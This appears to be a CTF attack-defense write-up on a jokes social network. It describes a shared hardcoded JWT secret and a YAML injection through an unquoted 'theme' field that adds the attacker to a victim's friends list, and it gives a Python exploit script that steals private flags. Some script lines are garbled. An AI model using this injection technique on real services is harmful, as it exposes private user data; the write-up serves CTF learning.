The service is the latest social network to restore the burnt museum of jokes
- Add your own jokes (for everyone or just for friends)
- View your jokes
- Search for jokes (you will see public jokes, as well as private jokes of those users with whom you are friends)
- Add friends to other users and add other users to your friends
All teams had the same JWT secret
secret := "HUI"
Adding a joke happens through this yaml
status: {{ .Status }}
theme: {{ .Theme }}
text: "{{ .Text }}"
Later this yaml is translated into golang map
The text
field is enclosed in quotation marks so that line breaks do not break the yaml structure.
But the theme
field is not in quotation marks.
Accordingly, we can insert any value there containing newlines and break the original structure.
Adding an anecdote goes like this:
res, err := r.col.UpdateOne(ctx, map[string]string{"username": username},
map[string]map[string]map[string]string{"$push": joke})
if err != nil {
return fmt.Errorf("error while adding joke: %w", err)
if res.MatchedCount == 0 {
return common.ErrNotExists
return nil
The $push
command iterates over the passed object and adds each key the corresponding value.
In our case, in joke
we have: {"jokes": {"status": ..., "theme": ..., "text": ...}}
Flags are kept in private jokes
To access them you need to become a friend of the user
User 1 considers himself a friend of user 2 if user 2 has user 1 in the friends
Accordingly, you can break the structure of the yaml by adding the desired user as a friend, and then reading his jokes
Combining it all together, we got sploit:
#!/usr/bin/env python3
import random
import sys
from string import ascii_letters
import requests
HOST = sys.argv[1]
PORT = 18888
PUBLIC_FLAG_ID = sys.argv[2]
def get_random_string() -> str:
return ''.join(random.choice(ascii_letters) for _ in range(20))
def sploit():
url = f"http://{HOST}:{PORT}/api"
username, theme = PUBLIC_FLAG_ID.split("+")
token ="{url}/register", data={"username": get_random_string(), "password": "123"}).json()["token"]
headers = {"Authorization": f"Bearer {token}"}
resp ="{url}/jokes", data={"status": "private",
"theme": f"zzzz\nfriends:\n {username}: yes\nsome:",
"text": "abacaba"}, headers=headers)
resp = requests.get(f"{url}/jokes", data={"username": username, "theme": theme}, headers=headers)
if __name__ == '__main__':